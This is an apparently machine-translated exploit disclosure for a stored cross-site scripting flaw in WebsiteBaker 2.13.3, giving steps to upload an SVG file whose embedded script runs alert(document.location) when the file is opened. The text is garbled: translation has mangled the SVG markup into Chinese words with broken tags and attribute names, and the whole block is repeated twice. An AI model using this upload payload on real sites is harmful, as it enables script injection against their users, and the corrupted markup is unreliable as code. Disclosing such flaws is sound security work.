利用标题:网站商人v2.13.3-存储的XSS
Application:网站商人
版本: 2.13.3
BUGS:存储的XSS
Technology: php
供应商URL: https://websitebaker.org/pages/en/home.php
软件link: https://wiki.websitebaker.org/doku.php/en/downloads
发现日期: 26.06.2023
作者:MirabbasAğalarov
在: Linux上测试
2。技术细节POC
====================================================
步骤:
1。登录帐户
2。去媒体
3。上传SVG文件
'''
?xml版本='1.0'startalone='no'?
!
svg版本='1.1'基profile='full'xmlns='http://www.w3.org/2000/svg'
polygon id='三角形'suption='0,0 0,50 50,0'填充='#009900'stroke='#004400'/
脚本类型='text/javascript'
警报(document.location);
/脚本
/svg
'''
4。转到SVG文件(http://localhost/Media/Malas.svg)
Application:网站商人
版本: 2.13.3
BUGS:存储的XSS
Technology: php
供应商URL: https://websitebaker.org/pages/en/home.php
软件link: https://wiki.websitebaker.org/doku.php/en/downloads
发现日期: 26.06.2023
作者:MirabbasAğalarov
在: Linux上测试
2。技术细节POC
====================================================
步骤:
1。登录帐户
2。去媒体
3。上传SVG文件
'''
?xml版本='1.0'startalone='no'?
!
svg版本='1.1'基profile='full'xmlns='http://www.w3.org/2000/svg'
polygon id='三角形'suption='0,0 0,50 50,0'填充='#009900'stroke='#004400'/
脚本类型='text/javascript'
警报(document.location);
/脚本
/svg
'''
4。转到SVG文件(http://localhost/Media/Malas.svg)